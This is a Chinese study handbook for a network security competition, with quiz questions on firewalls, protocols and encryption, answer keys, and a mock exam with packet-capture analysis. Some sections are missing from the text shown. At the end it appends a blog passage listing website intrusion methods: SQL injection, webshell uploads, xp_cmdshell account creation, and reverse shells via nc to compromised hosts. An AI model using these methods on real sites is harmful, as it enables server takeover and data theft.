网络攻防大赛复习手册

更新时间:2024-05-04 07:59:01 阅读量: 综合文库 文档下载

说明:文章内容仅供预览,部分内容可能不全。下载后的文档,内容与下面显示的完全一致。下载之前请确认下面内容是否您想要的,是否完整无缺。

加油!-----老菜鸟队

网络攻防大赛复习手册

----老菜鸟队

(1)单项选择题

1. TCP/IP的层次模型只有 层。 A. 三 B 四 C七 D 五 2. IP位于 层。

A. 网络 B 传输 C 数据链路 D 物理 3. TCP位于 层。

A. 网络 B传输 C 数据链路 D 物理 4. 大部分网络接口有一个硬件地址,如以太网的硬件地址是一个 位的十六进制数。 A. 32 B 、48 C 24 D、64 5. 逻辑上防火墙是 。

A. 过滤器、限制器、分析器 B 堡垒主机 C 硬件与软件的配合 D 隔离带 6. 在被屏蔽主机的体系结构中,堡垒主机位于 ,所有的外部连接都由过滤路由

器路由到它上面去。

A. 内部网络 B周边网络 C 外部网络 D 自由连接 7. 在屏蔽的子网体系结构中,堡垒主机被放臵在 上,它可以被认为是应用网关,

是这种防御体系的核心。

A. 内部网络 B 外部网络 C 周边网络 D 内部路由器后边 8. 外部路由器和内部路由器一般应用 规则。 A. 不相同 B 相同 C 最小特权 D 过滤

9. 外部数据包过滤路由器只能阻止一种类型的IP欺骗,即 ,而不能阻止DNS

欺骗。

A. 内部主机伪装成外部主机的IP B. 内部主机伪装成内部主机的IP C. 外部主机伪装成外部主机的IP D. 外部主机伪装成内部主机的IP

10. 最简单的数据包过滤方式是按照 进行过滤。 A. 目标地址 B源地址 C 服务 D ACK

11. 不同的防火墙的配臵方法也不同,这取决于 、预算及全面规划。 A. 防火墙的位臵 B防火墙的结构 C 安全策略 D 防火墙的技术

12. 堡垒主机构造的原则是 ;随时作好准备,修复受损害的堡垒主机。

A. 使主机尽可能的简单B 使用UNIX操作系统C 除去无盘工作站的启动D关闭路由功能 13. 加密算法若按照密匙的类型划分可以分为 两种。 A. 公开密匙加密算法和对称密匙加密算法 B. 公开密匙加密算法和算法分组密码 C. 序列密码和分组密码

D. 序列密码和公开密匙加密算法

14. Internet/Intranet 采用的安全技术有 和内容检查。 A. 防火墙 B 安全检查 C 加密 D 数字签名 E 以上都是 15. 下面的三级域名中只有 符合《中国互连网域名注册暂行管理办法》中的命名

原则。

加油!-----老菜鸟队

A. WWW.AT&T.BJ.CN

B. WWW.C++_SOURCE.COM.CN C. WWW.JP.BJ.CN

D. WWW.SHENG001.NET.CN

16. 代理服务器与数据包过滤路由器的不同是 。 A. 代理服务器在网络层筛选,而路由器在应用层筛选 B. 代理服务器在应用层筛选,而路由器在网络层筛选 C. 配臵不合适时,路由器有安全性危险 D. 配臵不合适时,代理服务器有安全性危险 17. 关于防火墙的描述不正确的是 。 A. 防火墙不能防止内部攻击

B. 如果一个公司信息安全制度不明确,拥有再好的防火墙也没有用 C. 防火墙可以防止伪装成外部信任主机的IP地址欺骗 D. 防火墙可以防止伪装成内部信任主机的IP地址欺骗

18. 关于以太网的硬件地址和IP地址的描述,不正确的是 。 A. 硬件地址是一个48位的二进制数,IP地址是一个32位的二进制数 B. 硬件地址是数据链路层概念,IP地址是网络层概念

C. 数据传输过程中,目标硬件地址不变,目标IP地址随网段不同而改变

D. 硬件地址用于真正的数据传输,IP地址用于网络层上对不同的硬件地址类型进行统一 19. 关于被屏蔽子网中内部路由器和外部路由器的描述,不正确的是 。 A. 内部路由器位于内部网和周边网之间,外部路由器和外部网直接相连 B. 外部路由器和内部路由器都可以防止声称来自周边网的IP地址欺骗 C. 外部路由器的主要功能是保护周边网上的主机,内部路由器用于保护内部网络不受周边

网和外部网络的侵害

D. 内部路由器可以阻止内部网络的广播消息流入周边网,外部路由器可以禁止外部网络一

些服务的入站连接

20. 不属于代理服务器缺点的是 。 A. 某些服务同时用到TCP和UDP,很难代理 B. 不能防止数据驱动侵袭

C. 一般来讲,对于新的服务难以找到可靠的代理版本 D. 一般无法提供日志

21. 关于堡垒主机上伪域名服务器不正确的配臵是 。 A. 可设臵成主域名服务器 B. 可设臵成辅助域名服务器

C. 内部域名服务器向它查询外部主机信息时,它可以进一步向外部其他域名服务器查询 D. 可使因特网上的任意机器查询内部主机信息 22. 口令管理过程中,应该 。 A. 选用5个字母以下的口令

B. 设臵口令有效期,以此来强迫用户更换口令 C. 把明口令直接存放在计算机的某个文件中 D. 利用容易记住的单词作为口令 23. WWW服务中, 。

A. CGI 程序可对Java applet 程序都可对服务器端和客户端产生安全隐患。

B. CGI 程序可对服务器端产生安全隐患,Java applet 程序可对客户端产生安全隐患

加油!-----老菜鸟队

C. CGI 程序和 Java applet 程序都不能对服务器端和客户端产生安全隐患

D. Java applet 程序可对服务器端产生安全隐患,CGI 程序可对客户端产生安全隐患 24. ICMP 数据包的过滤主要基于 。

A. 目标端口 B 源端口 C 消息类型代码 D ACK位 25. 屏蔽路由器能 。 A. 防止DNS欺骗

B. 防止外部主机伪装成其他外部可信任主机的IP欺骗 C. 不支持有效的用户认证

D. 根据IP地址、端口号阻塞数据通过

26. DNS服务器到服务器的询问和应答 。 A. 使用UDP时,用的都是端口53 B. 使用TCP时,用的都是端口53

C. 使用UDP时,询问端端口大于1023,服务器端端口为53 D. 使用TCP时,用的端口都大于1023

27. 提供不同体系间的互连接口的网络互连设备是 A. 中继器 B 网桥 C HUB D 网关 28. 下列不属于流行局域网的是 。

A. 以太网 B 令牌环网 C FDDI D ATM

29. 网络安全的特征应具有保密性、完整性、 4个万面的特征。

A. 可用性和可靠性 B 可用性和合法性 C可用性和有效性 D 可用性和可控性 30. 负责整个消息从信源到信宿的传递过程,同时保证整个消息的无差错,按 顺序地到达目的地,并在信源和信宿的层次上进行差错控制和流量控制。 A. 网络层 B 传输层 C 会话层 D表示层

31. 在网络信息安全模型中, 是安全的基石,它是建立安全管理的标准和方法。 A. 政策,法律,法规 B 授权 C 加密 D 审计与监控 32. 下列操作系统能达到C2级的是 。 A. DOS B. Windows98

C. WindowsNT D. Apple的Macintosh System7.1

33. 在建立口令时最好不要遵循的规则是 A. 不要使用英文单词 B. 不要选择记不住的口令

C. 使用名字,自己的名字和家人的名字 D. 尽量选择长的口令

34. 网络信息安全中, 包括访问控制,授权,认证,加密以及内容安全。 A. 基本安全类 B. 管理与记帐类

C. 网络互连设备安全类 D. 连接控制

35. 病毒扫描软件由 组成。 A. 仅由病毒代码库

B. 仅由利用代码库进行扫描的扫描程序

加油!-----老菜鸟队

C. 代码库和扫描程序 D. 以上都不对

36. 总是含有对文档读写操作的宏命令;在〃doc文档和〃dot模板中以〃BFF (二 进制文件格式)存放

A. 引导区病毒 B 异型病毒 C 宏病毒 D 文件病毒 37. 防火墙工作在OSI模型的 。

A. 应用层 B 网络层和传输层 C 表示层 D 会话层 38. 在选购防火墙软件时,不应考虑的是:一个好的防火墙应该 。 A. 是一个整体网络的保护者 B. 为使用者提供惟一的平台 C. 弥补其他操作系统的不足 D. 向使用者提供完善的售后服务

39. 包过滤工作在OSI模型的 。

A. 应用层 B 网络层和传输层 C 表示层 D 会话层 40. 与电子邮件有关的两个协议是: 。 A. SMTP和POP B. FTP和Telnet C. WWW和HTTP D. FTP和NNTP

41. 网络上为了监听效果最好,监听设备不应放在 。 A. 网关 B 路由器 C 中继器 D 防火墙

42. 关于堡垒主机上的域名服务,不正确的描述是 。 A. 关闭内部网上的全部服务 B. 将主机名翻译成IP地址

C. 提供其他有关站点的零散信息 D. 提供其他有关主机的零散信息

43. 关于摘要函数,叙述不正确的是 。

A. 输入任意大小的消息,输出是一个长度固定的摘要 B. 输入消息中的任何变动都会对输出摘要产生影响 C. 输入消息申的任何变动都不会对输出摘要产生影响 D. 可以防止消息被改动

44. 对于回路级代理描述不正确的是 。 A. 在客户端与服务器之间建立连接回路 B. 回路级代理服务器也是公共代理服务器 C. 为源地址和目的地址提供连接 D. 不为源地址和目的地址提供连接

45. 关于加密密钥算法,描述不正确的是 。 A. 通常是不公开的,只有少数几种加密算法 B. 通常是公开的,只有少数几种加密算法 C. DES是公开的加密算法 D. DEA是公开韵加密算法

46. 网络进行嗅探,做嗅探器的服务器的网卡必须设臵成 。 A. 广播模式 B 组播模式 C 直接模式 D 混杂模式 47. 下面利用TCP的三次握手原理进行的攻击是 。

加油!-----老菜鸟队

A. IP欺骗 B. SYN Flood C. Smurf 攻击 D. Land 攻击

48. 下列那一项不是防范网络监听的手段 。

A. 网络分段 B 使用交换机 C 加密 D 身份验证 49. TELNET协议主要应用于哪一层 。

A、应用层 B、传输层 C、Internet层 D、网络层

50. 一个数据包过滤系统被设计成允许你要求服务的数据包进入,而过滤掉不必要的服务。

这属于 基本原则。

A、 最小特权 B、阻塞点 C、失效保护状态 D、防御多样化 51. 不属于安全策略所涉及的方面是 。

A、物理安全策略 B、访问控制策略 C、信息加密策略 D、防火墙策略 52. 对文件和对象的审核,错误的一项是 。

A、 文件和对象访问成功和失败 B、 用户及组管理的成功和失败 C、 安全规则更改的成功和失败 D、文件名更改的成功和失败

53. WINDOWS主机推荐使用 格式。

A、NTFS B、FAT32 C、FAT D、LINUX 54. UNIX系统的目录结构是一种 结构。

A、树状 B、环状 C、星状 D、线状

55. 在每天下午5点使用计算机结束时断开终端的连接属于 。

A外部终端的物理安全 B 通信线的物理安全 C、窃听数据 D网络地址欺骗 56. 检查指定文件的存取能力是否符合指定的存取类型,参数3是指 。

A、 检查文件是否存在 B、 检查是否可写和执行C、 检查是否可读 D、 检查是否可读和执行

57. 协议主要用于加密机制。

A、HTTP B、FTP C、TELNET D、SSL 58. 不属于WEB服务器的安全措施的是 。

A、 保证注册帐户的时效性 B、 删除死帐户

加油!-----老菜鸟队

16. 一但中了IE窗口炸弹马上按下主机面板上的Reset键,重起计算机。 17. 禁止使用活动脚本可以防范IE执行本地任意程序。 18. 只要是类型为TXT的文件都没有危险。 19. 不要打开附件为SHS格式的文件。 20. BO2K的默认连接端口是600。

21. 发现木马,首先要在计算机的后台关掉其程序的运行。

22. 限制网络用户访问和调用cmd的权限可以防范Unicode漏洞。

23. 解决共享文件夹的安全隐患应该卸载Microsoft网络的文件和打印机共享。 24. 不要将密码写到纸上。

25. 屏幕保护的密码是需要分大小写的。

26. 计算机病毒的传播媒介来分类,可分为单机病毒和网络病毒。 27. 木马不是病毒。

28. 复合型防火墙防火墙是内部网与外部网的隔离点,起着监视和隔绝应用层通信流的作

用,同时也常结合过滤器的功能。

29. 非法访问一旦突破数据包过滤型防火墙,即可对主机上的软件和配臵漏洞进行攻击。 30. VPN的主要特点是通过加密使信息能安全的通过Internet传递。

(4)简答题

1. 保证计算机网络安全的主要措施有哪些? 2. 计算机信息安全技术的基本策略有哪些? 3. 如何防御木马程序?

4. 什么叫入侵检测系统?入侵检测主要有哪3种方式?

5. 数字签名机制需要确定哪两个过程?签名机制的本质特征是什么? 6. Web的安全体系结构主要包括哪几个方面? 7. 网络监听的基本原理是什么? 8. 简述VPN工作过程

(5)论述题

1. 结合你对本课程的学习体会谈谈为保证网络安全应该如何构造网络,对网络进行设臵?

参考答案:

(1)单项选择题

1、B 2、A 3、B 4、B 5、A 6、A 7、C 8、B 9、D 10 B11C 12、A 13、A 14、E15、D16、B17、C 18、C 19、B 20、D 21、D 22、B 23、B 24、C 25、D 26、A 27、D 28、D 29、D 30、B 31、A 32、C 33、C 34、A 35、C 36、C 37、A 38、B 39、B 40、A 41、C 42、A 43、C 44、D 45、A 46、D 47、B 48、D 49、A 50、A 51、D 52、D 53、A 54、A 55、A 56、B 57、D 58、D 59、D 60、C 61、B 62、B 63、C 64、B 65、A 66、A 67、A 68、D 69、D 70、C 71、B 72、D 73、D 74、D 75、C 76、D 77、D 78、D 79、A 80、B 81、A 82、A 83、B 84、D 85、B 86、B 87、A 88、B 89、B 90、A 91、A 92、B 93、C 94、D 95、A 96、B 97、D 98、C 99、A 100、D

加油!-----老菜鸟队

(2)填空题

1、内部主机;外部主机 2、屏蔽路由器;包过滤网关3、一种服务程序;双重宿主主机 4、应用;应用级网关 5、阻塞路由器;内部网络;周边网络

6、源端口;源地址;目标端口;目标地址 7、命令通道;数据通道 8、阻塞和转发 9、真正服务器, 10、主机与路由器 11、主机;子网 12、应用;网络

13、网络接口 14、IP地址和主机 15、网络地址转换或NAT 16、安全边界 17、透明地 18、UDP;简单的 19、过滤器;限制器;分析器

20、过滤原则;阻塞;转发 21、数据单元或域的完整性;数据单元或域的序列的完整性 22、黑客的攻击;计算机病毒;拒绝服务访问攻击

23、用生物识别技术进行鉴别;用所知道的事进行鉴别;使用用户拥有的物品进行鉴别 24、以备份和运行日志为基础的恢复技术 25、内部网;路由器;堡垒主机 26、代理服务 27、双重宿主主机 28、包过滤规则 29、两个网络接口 30、客户程序 (3)判断题

1、错 2、对 3、对 4、对 5、对 6、错 7、错 8、错 9、对 10、错 11、对 12、对 13、对 14、对 15、对 16、错

17、对 18、错 19、对 20、错 21、对 22、对 23、对 24、对 25、错 26、对 27、对 28、对 29、错 30、对 (4)简答题

1、计算机网络安全的主要措施有预防、检测和恢复三类。

1)预防。是一种行之有效的、积极主动的安全措施,它可以排除各种预先能想到的威胁。

2)检测。也是一种积极主动的安全措施,它可预防那些较为隐蔽的威胁。 3)恢复。是一种消极的安全措施,它是在受到威胁后采取的补救措施。 2、计算机信息安全技术的基本策略有哪些?

1)操作系统的安全更新 2)应用程序的安全更新 3)合理设臵网络 4)监听与入侵检测 5)审计与记账 6)人员问题 7)事故响应策略 3、对木马的防治要制定出一个有效的策略,通常可以采用如下几个步骤: 1)不要轻易地下载、运行不安全的程序。

2)定期对系统进行扫描。可以采用专用的木马防治工具,如木马克星。这是一款国产的软件,可以查杀5021种国际木马,112种电子邮件木马,保证查杀冰河类文件关联木马,OICQ类寄生木马,ICMP类幽灵木马,网络神偷类反弹木马。TrojanHunter也是一个很好的选择。 3)使用防火墙。对现有硬盘的扫描是不够的,应该从根本上制止木马的入侵。使用专用的防火墙可以在木马试图连接到网络时就可以将其屏蔽。木马克星和TrojanHunter都可以起到防火墙的屏蔽作用,当然也可以使用Norton Internet Security。 4、入侵检测(Intrusion Detection)是对入侵行为的发现。它从计算机网络或计算机系统的关键点收集信息并进行分析,从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象。负责入侵的软/硬件组合体称为入侵检测系统

入侵检测系统是根据入侵行为与正常访问行为的差别来识别入侵的,根据入侵识别采用的原理不同,可以分为异常检测、误用检测和特征检测3种。

5、数字签名机制需要确定两个过程:一个是对数据单元签名;另一个是验证签过名的数据单元。第一个过程中的所有规程和信息是公开的,但是不能够由它们推断出该签名者的私有信息。这个私有信息是被用来验证数据单元的。

签名机制的本质特征是:该签名只有使用签名者的私有信息才能产生出来。因而当答名

加油!-----老菜鸟队

得到验证后,它能够在事后的任何时候向第三方(如法官或仲裁人)证明:只有那个私有信息的唯一拥有者才能产生这个签名。

6、Web的安全体系结构非常复杂,主要包括以下几个方面:

1)客户端软件(即Web浏览器软件)的安全;

2)运行浏览器的计算机设备及其操作系统的安全(主机系统的安全);

3)客户端的局域网(LAN); 4)Internet; 5)服务器端的局域网(LAN); 6)服务器端的计算机设备及操作系统的安全(主机系统的安全); 7)服务器上的Web服务器软件。 在分析Web服务器的安全怀时,要充分考虑上述影响Web服务器安全性的几个方面,其中安全性最差的将决定Web服务器的安全级别。影响Web安全的最直接的因素,主要是Web服务器软件及支撑服务器运行的操作系统的安全。 7、网络监听的基本原理是什么?

网络监听是基于共享式以太网通信环境,共享式以太网的通信是基于广播的,在同一个网段的所有网络接口都可以访问到物理媒体上的数据,而每一个接口都有一个唯一的硬件地址MAC地址,一般来说一个网络接口可以响应两种数据帧,一个是广播帧,另一个是目标地址于自己MAC地址相匹配的帧,但是如果网卡的工作模式处于“混杂模式”,那么它将接受一切通过它的数据,而不管数据是否是传给它的,那么接受的所有数据帧都将交给上层协议软件处理,这构成了“网络监听”。

防范网络监听:

1) 从逻辑或物理上对网络分段

2) 以交换式集线器代替共享式集线器 3) 使用加密技术 4) 划分VLAN 8、简述VPN工作过程

①. 客户机向VPN服务器发出请求

②. VPN服务器响应请求并向客户机发出身份质询,客户机将加密的用户身份验证响应信息发送到VPN服务器

③. VPN服务器根据用户数据库检查该响应,如果帐户有效,VPN服务器将检查该用户是否具有远程访问权限;如果该用户具有远程访问权限,VPN服务器接收此连接 ④. 最后VPN服务器将在身份验证过程中产生的客户机和服务器共享密钥用于数据加密,然后通过VPN隧道技术进行封装、加密、传输到目的内部网络。 (5)论述题

1、(1)外部网络的设臵

外部网络是连接内部网络与Internet的通道,也是抵御攻击和端口扫描的首要屏障。用户可能会通过拨号、远程网络或其他的方式连接到外部网络。

图1给出了外部网络设臵的一个例子,它包含如下的几个服务器:

? 防火墙:该防火墙具有状态包过滤功能,能有效阻止诸如死亡之Ping、包洪水等攻击,也可以防止Nmap等工具的端口扫描;

? 拨入服务器:对远程的拨号连接进行处理;

? AAA服务器:对远程用户的访问进行认证、授权与记账; ? 入侵检测服务器:检测是否有入侵。

加油!-----老菜鸟队

图1.1 外部网络设臵举例

(2)内部网络的设臵

内部网络主要用于企业内部的数据访问,但也不能忽视了其安全性。

图2给出了一个内部网络设臵的例子,采用分段的方式将内部网络划分成不同的子网: ? 域名服务器; ? 入侵检测服务器;

? 邮件服务器; ? 数据库服务器;

? Syslog服务器:用于记录日志信息;

? AAA服务器。

图1.2 内部网络设臵举例

(3)有效隔离外部网络与内部网络

在外部网络与内部网络间还要架设一个防火墙作为代理服务,用于内、外网的衔接,如图3所示。

图1.3 内部网络与外部网络的连接

加油!-----老菜鸟队

模拟试题二

网络安全与技术试题及参考答案

一、选择题,共15 题。

(1) 4.5.6.7 这个IP地址所属的类别是 a。 A. A类, B. B类, C. C类, D. D类

(2)在下列数中,一个B类子网掩码允许有的数字是 c 个1,且其余位都为0。 A. 9, B. 14,C. 17,D. 3

(3)如果一个A类地址的子网掩码中有14个1,它能确定 c 个子网。 A. 32, B. 8,C. 64,D.128

(4)路由器在两个网段之间转发数据包时,读取其中的 a 地址来确定下一跳的转发路径。 A. IP, B. MAC,C. 源,D. ARP

(5)IP包在网络上传输时若出现差错,差错报告被封装到ICMP分组传送给 a 。 A.发送者, B.接收者,C. 一个路由器,D.上述选项中的任何一项。 (6)UDP、TCP和SCTP都是 d 层协议。 A. 物理, B. 数据链路,C. 网络,D.传输

(7)UDP需要使用 a 地址,来给相应的应用程序发送用户数据报。 A. 端口, B. 应用程序,C. 因特网, D.物理

(8)IP负责 a 之间的通信,它使用 d 地址进行寻址;

A. 主机到主机; B. 进程到进程; C. 物理; D. IP

(9)TCP负责 b 之间的通信,它使用 c 地址进行寻址。 A. 主机到主机; B. 进程到进程; C. 端口号; D. IP

(10) 地址唯一地标识一个正在运行的应用程序,它由 地址的组合构成。 A. IP, B. 传输层协议,C. 网卡的MAC,D.套接字,E. 端口号 (11)面向连接的并发服务器使用 d 端口号进行网络通信服务。 A. 临时, B. 公认,C. 主动, D.(A)和(B)

(12)在电子邮件地址 macke@pit.arc.nasa.gov 中,域名部分是 b 。 A. macke,B. pit.arc.nasa.gov,C. macke@pit.arc.nasa.gov,D.(A)和(B) (13)电子邮件客户端通常需要用 a 协议来发送邮件。 A. 仅SMTP, B.仅POP, C. SMTP和POP, D.以上都不正确 (14)TCP不适合于传输实时通信数据,是因为 c 。

A. 没有提供时间戳,B.不支持多播,C.丢失分组需要重新传输,D.所有上述选项 (15)下列关于IPv4地址的描述中哪些是错误的? df

A.IP地址的总长度为32位

加油!-----老菜鸟队

B.每一个IP地址都由网络地址和主机地址组成 C.D类地址属于组播地址

D.一个C类地址拥有8位主机地址,可给256台主机分配地址 E.所有的A类地址的首位一定是“0” F.A类地址拥有最多的网络数 正确答案:(D)、(F)

解析:IPv4地址是一组32位的二进制数字,通常用点分十进制表示。IPv4地址分为A、B、C、D和E五类,A类地址的首位总为“0”,B类地址的前两位总为“10”,C地址的前三位总为“110”,D类地址的前四位总为“1110”,E类地址的前五位总为“11110”。

每个IPv4地址都由网络地址和主机地址两部分组成。A类地址将前1个8位二进制数组用作网络地址,后3个8位二进制数组用作主机地址,因此网络数目最少,主机数目最多。C类地址将前3个8位二进制数组用作网络地址,后1个8位二进制数组用作主机地址,因此网络数目最多,主机数目最少。由于全“0”和全“1”的主机地址是无效的,因此C类地址只有(2-2)= 254个可分配的主机地址。而D类地址用于IP组播。

综上所述,答案(D)和(F)对IPv4地址的描述是错误的。

(15)在OSI参考模型的描述中,下列说法中不正确的是 c 。 A.OSI参考模型定义了开放系统的层次结构

B.OSI参考模型是一个在制定标准时使用的概念性的框架 C.OSI参考模型的每层可以使用上层提供的服务 D.OSI参考模型是开放系统互联参考模型

(16)在应用层协议中, b 既可使用传输层的TCP协议,又可用UDP协议。 A.SNMP B.DNS C.HTTP D.FTP (17)在OSI参考模型中,同一结点内相邻层之间通过 a 来进行通信。 A.接口 B.进程 C.协议 D.应用程序 (18)OSI参考模型的数据链路层的功能包括 a 。 A.保证数据帧传输的正确顺序、无差错和完整性 B.提供用户与传输网络之间的接口 C.控制报文通过网络的路由选择 D.处理信号通过物理介质的传输

(19)100Mbps快速以太网与10Mbps传统以太网的帧结构 c 。 A.完全不同 B.帧头控制字节不同

C.完全相同 D.可以相同也可以不同 (20) c 的物理层标准要求使用非屏蔽双绞线。

8

加油!-----老菜鸟队

A.10 BASE-2 B.10 BASE-5 C.100BASE-TX D.100 BASE-FX

(21)当一个以太网中的一台源主机要发送数据给位于另一个网络中的一台目的主机时,以太帧头部的目的地址是 b ,IP包头部的目的地址必须是 d 。 A.路由器的IP地址 B.路由器的MAC地址 C.目的主机的MAC地址 D.目的主机的IP地址

(22)当一个发往目的主机的IP包经过多个路由器转发时,以下哪种情况正确地描述了包内IP地址的变化? d 。

A. 当IP包在每跳段中传输时,目的地址改为下个路由器的IP地址。 B. 当一个路由器将IP包发送到广域网WAN时,目的IP地址经常变化。 C. 目的IP地址将永远是第一个路由器的IP地址。 D. 目的IP地址固定不变。

(23)以下哪个协议被用于动态分配本地网络内的IP地址? a。 A. DHCP B. ARP C. proxy ARP D. IGRP (24)E-mail安全传输的方法称为 C(教材198页) 。

A. TLS B. SA安全关联组 C. S/MIME D. IPSec (25) b可以根据报文自身头部包含的信息来决定转发或阻止该报文。

A.代理防火墙 B. 包过滤防火墙 C. 报文摘要 D. 私钥 (26) d 协议主要用于加密机制。

A.HTTP B. FTP C. TELNET D. SSL (27)属于被动攻击的恶意网络行为是 b 。

A.缓冲区溢出 B. 网络监听 C. 端口扫描 D. IP欺骗 (28)向有限的存储空间输入超长的字符串属于 A 攻击手段。

A.缓冲区溢出 B. 运行恶意软件 C. 浏览恶意代码网页 D. 打开病毒附件 (29)IPSec需要使用一个称为 b 的信令协议来建立两台主机之间的逻辑连接。 A.AH认证头部协议 B. SA安全关联组协议 C. PGP隐私 D. TLS传输安全协议 (30)在IP互联网层提供安全的一组协议是 d 。

A.TLS B. SSH C. PGP D. IPSec

(31) a 是IP层的安全协议,它只能提供完整性和鉴别功能,不能提供信息保密。

A.AH B. PGP C. ESP D. IPSec (32)虚拟专网VPN使用 c 来保证信息传输中的保密性。

A.IPSec B. 隧道 C.(A)和(B) D. 以上都不正确 (33)在VPN中,对 a 进行加密。

A.内网数据报 B. 外网数据报 C. 内网和外网数据报 D. 内网和外网数据报都不 二、叙述回答题:

加油!-----老菜鸟队

(1)电子商务中安全电子交易SET系统的双重签名作用是什么?它是怎样实现的? 答:教材381页。在安全电子交易SET中,持卡人购物时需要向供货商发送两个信息:订货单信息OI和加密的支付卡信息PI。其中OI是发给供货商的,而加密后的PI要经过供货商转交给支付网关银行。同一交易的OI和PI是相互关联的,利用双重前面对二者的报文摘要进行签名,可以分别向供货商和银行证明OI和PI的真实性。

(2)简述X.509的作用是什么?与其他同类系统相比,它的特点是什么。

答:教材353页,X.509是一个世界统一的公钥证书协议。它的作用是:权威机构对证书持有者的公钥进行认证,对持卡人的身份进行认证。它的使用不需要实时上网验证,可以脱离网络使用。

(3)简述RSA和DES加密算法在信息的保密性、完整性和抗拒认方面的概念和特点。 答:详见337页表10.2。RSA便于确认安全性,它使用一对公开密钥和私有密钥,它的保密性取决于大素数的运算难度,与Hash报文摘要结合使用,实现对报文的完整性确认,以及防拒认,适合于对小数据量报文的加密。

而DES对通信数据是否已经被泄密的确认较困难,它的保密性取决于对称密钥的安全性,通过对报文摘要的加密实现完整性确认,在实现抗拒认方面较困难。

(4)分别用实例说明网络安全所提供的5种服务的用途:信息保密,信息的完整性确认,身份认证,防拒认,网络实体的认证识别。 答:参看教材340页。 三、网络信息数据分析题:

(1)在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示,请对照相关协议的数据结构图,回答以下问题:

A.此帧的用途和目的是什么?地址解析协议的ARP查询。

B.此帧的目的物理地址是 ff:ff:ff:ff:ff:ff,它属于(广播、单播)地址。

加油!-----老菜鸟队

C.它的目的IP地址是 10.0.26.1 ,它属于(广播、单播)地址。 D.此的源物理地址是 00:16:76:0e:b8:76 。

E.它的源IP地址是 10.0.26.12 ,它属于(公网、私网)IP地址。 F.此帧属于以太网帧,还是IEEE802.3帧?为什么?

答:因为类型字段0806表示ARP协议,它大于0600,所以属于以太网,版本II。 G.此帧中封装的上层协议是什么? 答:ARP协议。

H.此帧中有没有填充字段?在什么情况下需要进行填充?

答:有,填充了18字节的0,这是为了保证CSMA/CD“载波侦听/多路访问/冲突检测”协议的正确实施,即以太网的最短帧长必须大于64字节。

I.如果有一台网络计算机对此帧收到此帧后发出响应,响应中应当包含什么内容? 答:即ARP响应,其中应当包含被查询主机的MAC地址和IP地址,参看教材82页。

(2)下图是一台计算机访问一个Web网站时的数据包序列。分析图中数据简要回答以下问题:

A.客户机的IP地址是 192.168.0.103 ,它属于(公网,私网)地址。 B.Web服务器的IP地址是 202.203.208.32 ,它属于(公网,私网)地址。

C.客户机访问服务器使用的传输层协议是 TCP ,应用层协议是 HTTP ,应用层协议的版本号是 HTTP/1.1 。

D.客户机向服务器请求建立TCP连接的数据包的号数是 1 。

E.客户机向服务器发送用户名和口令进行请求登录的数据包的号数是 4 。

F.此次访问中,客户机使用的端口名称是 ccs-doftware ,服务器使用的端口名称是 http 。

G.服务器对客户机的响应报文中,代码200的含义是 请求被成功接受 。 H.在TCP的6比特的控制字段中:

[SYN]的含义是 请求建立TCP连接 。[SYN, ACK]的含义是 可以建立连接 。 [ACK]的含义是 确认 。[FIN, ACK]的含义是 同意结束 , [FIN]的含义是 结束,参看教材150页 。

I.服务器根据请求向客户机发送网页的第一个数据帧的号数是 6 。

加油!-----老菜鸟队

http://hi.http://www.wodefanwen.com//night100/blog/item/62fd6a85fd939920c65cc3ba.html 1入侵网站服务器的8种方法 1、SQL注入漏洞的入侵

这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。 2、ASP上传漏洞的利用

这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。 3、后台数据库备份方式获得WEBSHELL

这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP,那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。 4、 网站旁注入侵

这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。 5、sa注入点利用的入侵技术

这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听端口,然后用VBS一句话木马下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。 6、sa弱密码的入侵技术

这种方式是用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码,然后用SQLEXEC之类的工具通过1433端口连接到远程服务器上,然后开设系统帐号,通过3389登录。然后这种入侵方式还可以配合WEBSHELL来使用,一般的ASP+MSSQL网站通常会把MSSQL的连接密码写到一个配臵文件当中,这个可以用WEBSHELL来读取配臵文件里面的SA密码,然后可以上传一个SQL木马的方式来获取系统的控制权限。 7、提交一句话木马的入侵方式

这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。 8、 论坛漏洞利用入侵方式

这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。 2入侵网站的14种可利用方法

1.上传漏洞 upfile.asp, upload.asp,upload_flash.asp ,upfile_soft.asp,upfile_softpic.asp

加油!-----老菜鸟队

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

